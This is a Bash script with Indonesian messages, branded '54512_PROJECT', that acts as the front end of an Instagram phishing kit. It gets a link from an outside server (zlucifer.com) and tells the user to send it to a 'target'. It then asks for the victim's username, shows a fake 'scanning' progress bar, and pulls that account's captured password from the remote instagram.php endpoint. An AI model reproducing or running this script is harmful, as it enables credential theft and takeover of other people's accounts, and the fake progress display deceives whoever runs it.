#!/bin/bash
echo "                       _______   _     _   _______  ____      _______ "
sleep 0.03 
echo "                      |  _____| | |   | | |  _____||__  |    |_____  |"
sleep 0.03
echo "                      | |       | |   | | | |         | |          | |"
sleep 0.03
echo "                      | |_____  | |___| | | |_____    | |     _____| |"
sleep 0.03
echo "                      |_____  | |_____  | |_____  |   | |    |  _____|"
sleep 0.03
echo "                            | |       | |       | |   | |    | |"
sleep 0.03
echo "                       _____| |       | |  _____| | __| |__  | |_____ "
sleep 0.03
echo "                      |_______|       |_| |_______||_______| |_______|"
echo "            ====================================================================="
echo "            ===                       54512_PROJECT                           ==="
echo "            ====================================================================="
echo Selamat datang jones,siapa nick lo? #tulisan keluar
read nick #membaca yang ditulis
echo "hahaha jones :v"
get_url=$(curl -s http://zlucifer.com/api/best9.php)
cek='curl -s '$get_url # check status
response=`curl -s -o /dev/null -w "%{http_code}" $cek`
#echo $response
if [[ $response != *pre* ]]; then
    echo
    echo "Website Offline sementara"
else
    echo "trik penggunaan"
    echo "watch & learn"
    echo "1.Copy link disamping :http://zlucifer.com/api/best9.php"
    echo "2.Kirim link yang sudah di copy ke target(hanya untuk instagram)"
    echo "3.Jika korban sudah terkena bisa langsung di cek"
    echo "4.asshiap"
    echo "Ingin melakukan pengecekan?"
    echo "y/n?"
    read pengecekan
    echo
    if [ $pengecekan = "y" ]; then
            echo "Silahkan masukan username target"
    echo contoh hack.coc.unlimited
    read target # masukin user target
    echo
    echo Apakah username $target "sudah benar?"
    echo y/n?
    read confirm
    echo
    if [ $confirm = "y" ]; then
        echo Melakukan pencarian password username : $target
        i=0
        max=100
        while [ $i -le $max ]; do
        echo -ne "\nScanning percentage : $i% "
        sleep 0.03
        if [ $i -eq 100 ]; then
            echo -ne " [complete!]\n"
            echo "Sabar"            
            echo "========================================"
            cek_target=`curl -s $get_url/instagram.php?cari=$target`
            echo -e $cek_target
            echo "======================================="
            echo " Jangan coba ke mantan"
            echo " -lyn545lyn"
            echo "Terimakasih sudah menggunakan 54512_PROJECT"
            echo "semoga hari-harimu menyenangkan"
            echo "(note:semoga lo dapet pacar)"
            echo "======================================="
            fi
            let i++
            done
        else
            echo "Kesalahan"
        fi
    else
        echo "ありがとう"
     fi    
fi
